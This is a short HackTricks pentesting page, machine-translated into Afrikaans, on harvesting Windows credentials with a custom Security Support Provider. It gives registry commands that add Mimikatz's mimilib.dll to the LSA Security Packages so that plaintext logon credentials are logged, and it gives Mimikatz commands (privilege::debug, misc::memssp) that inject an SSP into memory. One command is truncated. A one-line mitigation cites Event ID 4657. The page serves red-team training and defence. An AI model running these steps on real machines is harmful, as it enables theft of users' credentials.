hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.6 KiB

Custom SSP

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

Custom SSP

Leer wat 'n SSP (Security Support Provider) is hier.
Jy kan jou eie SSP skep om in te vang in duidelike teks die akkrediteerings wat gebruik word om toegang tot die masjien te verkry.

Mimilib

Jy kan die mimilib.dll binêre gebruik wat deur Mimikatz verskaf word. Dit sal alle akkrediteerings in duidelike teks in 'n lêer log.
Plaas die dll in C:\Windows\System32\
Kry 'n lys van bestaande LSA Veiligheid Pakkette:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Voeg mimilib.dll by die Veiligheidsondersteuningsverskafferlys (Veiligheidspakkette):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

En na 'n herlaai kan alle akrediteerings in duidelike teks gevind word in C:\Windows\System32\kiwissp.log

In geheue

Jy kan dit ook direk in geheue inspuit met Mimikatz (let op dat dit 'n bietjie onstabiel/nie werkend kan wees):

privilege::debug
misc::memssp

This won't survive reboots.

Mitigering

Event ID 4657 - Oudit skepping/wijziging van HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}